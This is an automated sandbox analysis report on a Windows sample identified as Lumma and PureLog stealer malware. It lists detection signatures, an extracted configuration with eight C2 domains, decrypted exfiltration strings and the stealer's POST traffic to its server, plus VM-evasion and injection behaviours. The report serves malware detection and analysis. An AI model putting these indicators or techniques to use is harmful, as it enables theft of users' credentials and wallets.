Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1584228
MD5:e9f13d0b330a73ece569b6115d2ac4f0
SHA1:ae46dcc7a771c7adf161ddd0f48b6b5b5f22bfda
SHA256:9c4afe3e68312e44bbaa3f122a251bb087f72d94adf8d432bdd8382087086c92
Tags:NETexeMSILuser-jstrosch
Infos:

Detection

LummaC, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E9F13D0B330A73ECE569B6115D2AC4F0)
    • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E9F13D0B330A73ECE569B6115D2AC4F0)
    • WerFault.exe (PID: 7000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 160 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["abruptyopsn.shop", "noisycuttej.shop", "cloudewahsj.shop", "wholersorie.shop", "tirepublicerj.shop", "rabidcowse.shop", "framekgirus.shop", "nearycrepso.shop"], "Build id": "XpLY32--"}
SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              0.0.file.exe.100000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.file.exe.34f9550.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.file.exe.34f9550.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-04T22:58:08.034243+010020283713Unknown Traffic192.168.2.449733104.21.64.1443TCP
                    2025-01-04T22:58:09.019156+010020283713Unknown Traffic192.168.2.449735104.21.64.1443TCP
                    2025-01-04T22:58:10.221347+010020283713Unknown Traffic192.168.2.449737104.21.64.1443TCP
                    2025-01-04T22:58:11.328741+010020283713Unknown Traffic192.168.2.449740104.21.64.1443TCP
                    2025-01-04T22:58:12.715275+010020283713Unknown Traffic192.168.2.449742104.21.64.1443TCP
                    2025-01-04T22:58:13.997441+010020283713Unknown Traffic192.168.2.449744104.21.64.1443TCP
                    2025-01-04T22:58:15.331970+010020283713Unknown Traffic192.168.2.449745104.21.64.1443TCP
                    2025-01-04T22:58:17.342354+010020283713Unknown Traffic192.168.2.449746104.21.64.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-04T22:58:08.548914+010020546531A Network Trojan was detected192.168.2.449733104.21.64.1443TCP
                    2025-01-04T22:58:09.491546+010020546531A Network Trojan was detected192.168.2.449735104.21.64.1443TCP
                    2025-01-04T22:58:17.803148+010020546531A Network Trojan was detected192.168.2.449746104.21.64.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-04T22:58:08.548914+010020498361A Network Trojan was detected192.168.2.449733104.21.64.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-04T22:58:09.491546+010020498121A Network Trojan was detected192.168.2.449735104.21.64.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-04T22:58:08.034243+010020586291Domain Observed Used for C2 Detected192.168.2.449733104.21.64.1443TCP
                    2025-01-04T22:58:09.019156+010020586291Domain Observed Used for C2 Detected192.168.2.449735104.21.64.1443TCP
                    2025-01-04T22:58:10.221347+010020586291Domain Observed Used for C2 Detected192.168.2.449737104.21.64.1443TCP
                    2025-01-04T22:58:11.328741+010020586291Domain Observed Used for C2 Detected192.168.2.449740104.21.64.1443TCP
                    2025-01-04T22:58:12.715275+010020586291Domain Observed Used for C2 Detected192.168.2.449742104.21.64.1443TCP
                    2025-01-04T22:58:13.997441+010020586291Domain Observed Used for C2 Detected192.168.2.449744104.21.64.1443TCP
                    2025-01-04T22:58:15.331970+010020586291Domain Observed Used for C2 Detected192.168.2.449745104.21.64.1443TCP
                    2025-01-04T22:58:17.342354+010020586291Domain Observed Used for C2 Detected192.168.2.449746104.21.64.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-04T22:58:07.459055+010020586281Domain Observed Used for C2 Detected192.168.2.4503651.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-04T22:58:11.823080+010020480941Malware Command and Control Activity Detected192.168.2.449740104.21.64.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-04T22:58:15.336589+010028438641A Network Trojan was detected192.168.2.449745104.21.64.1443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://tirepublicerj.shop:443/apiCLSIDAvira URL Cloud: Label: malware
                    Source: https://tirepublicerj.shop/)Avira URL Cloud: Label: malware
                    Source: https://tirepublicerj.shop/ndowsAvira URL Cloud: Label: malware
                    Source: https://tirepublicerj.shop/Avira URL Cloud: Label: malware
                    Source: https://tirepublicerj.shop/apiAvira URL Cloud: Label: malware
                    Source: https://tirepublicerj.shop/9Avira URL Cloud: Label: malware
                    Source: https://tirepublicerj.shop/api8Avira URL Cloud: Label: malware
                    Source: 0.2.file.exe.34f9550.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "noisycuttej.shop", "cloudewahsj.shop", "wholersorie.shop", "tirepublicerj.shop", "rabidcowse.shop", "framekgirus.shop", "nearycrepso.shop"], "Build id": "XpLY32--"}
                    Source: file.exeReversingLabs: Detection: 39%
                    Source: file.exeVirustotal: Detection: 43%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.5% probability
                    Source: file.exeJoe Sandbox ML: detected
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: XpLY32--
                    Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00415D89 CryptUnprotectData,2_2_00415D89
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Windows.Forms.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: mscorlib.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: System.ni.pdbRSDS source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: mscorlib.ni.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: System.pdb) source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: Handler.pdb source: file.exe, WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: Handler.pdbt-^q source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: System.ni.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: Binary string: System.pdb source: WEREBF6.tmp.dmp.5.dr
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]2_2_00441816
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, esi2_2_0043D0D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]2_2_0043D0D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]2_2_0040C080
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, word ptr [eax]2_2_004442E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], cx2_2_00418BA2
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh2_2_00444C20
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, edx2_2_00430F03
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042F716
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]2_2_00417054
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]2_2_0041B021
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0041B021
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_004438E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_004438F9
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_004438FB
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]2_2_00422880
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, bx2_2_00427885
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_0041F170
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-2Ch], eax2_2_004421E9
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi+10h], 00000000h2_2_004421E9
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esi]2_2_0041618C
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_0041BA52
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, ecx2_2_0041BA52
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0041BA52
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh2_2_00402210
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0043A230
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00431AF5
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]2_2_0040B280
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_00440A90
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]2_2_00441B50
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_00409360
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00422370
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042FB7D
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]2_2_00408320
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_00419B30
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0041F3E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], al2_2_0041B3F2
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax2_2_0041AB90
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx2_2_00428C62
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax2_2_00427C10
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]2_2_00414C30
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax2_2_00418492
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, word ptr [ebx]2_2_0043CD40
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042C5E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], al2_2_0041B58F
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_004195B6
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_004195B6
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, edx2_2_0043E6E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [edx]2_2_0043E6E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, edx2_2_00430F4E
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, edx2_2_00430F54
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebx], ax2_2_0041A770
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]2_2_00427FC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]2_2_00427FC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]2_2_004437D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]2_2_0042A7F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx2_2_0042A7F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax2_2_00427FFD
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx2_2_0042AF92
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042AF92
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx2_2_0042AFB0

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2058628 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop) : 192.168.2.4:50365 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49742 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49740 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49735 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49737 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49745 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49733 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49744 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2058629 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tirepublicerj .shop in TLS SNI) : 192.168.2.4:49746 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49735 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49745 -> 104.21.64.1:443
                    Source: Malware configuration extractorURLs: abruptyopsn.shop
                    Source: Malware configuration extractorURLs: noisycuttej.shop
                    Source: Malware configuration extractorURLs: cloudewahsj.shop
                    Source: Malware configuration extractorURLs: wholersorie.shop
                    Source: Malware configuration extractorURLs: tirepublicerj.shop
                    Source: Malware configuration extractorURLs: rabidcowse.shop
                    Source: Malware configuration extractorURLs: framekgirus.shop
                    Source: Malware configuration extractorURLs: nearycrepso.shop
                    Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.64.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.64.1:443
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tirepublicerj.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: tirepublicerj.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0BJTZMSTNMF6ZWXQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18146Host: tirepublicerj.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UILB0NA6RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8725Host: tirepublicerj.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0HSGNRLJRUP0IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: tirepublicerj.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y50MEZKPLS8CSHAPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 976Host: tirepublicerj.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GB16ICI9CGD0FDQ47JLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550376Host: tirepublicerj.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: tirepublicerj.shop
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: tirepublicerj.shop
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tirepublicerj.shop
                    Source: file.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                    Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: file.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: file.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                    Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
                    Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
                    Source: file.exeString found in binary or memory: http://ocsp.entrust.net02
                    Source: file.exeString found in binary or memory: http://ocsp.entrust.net03
                    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                    Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
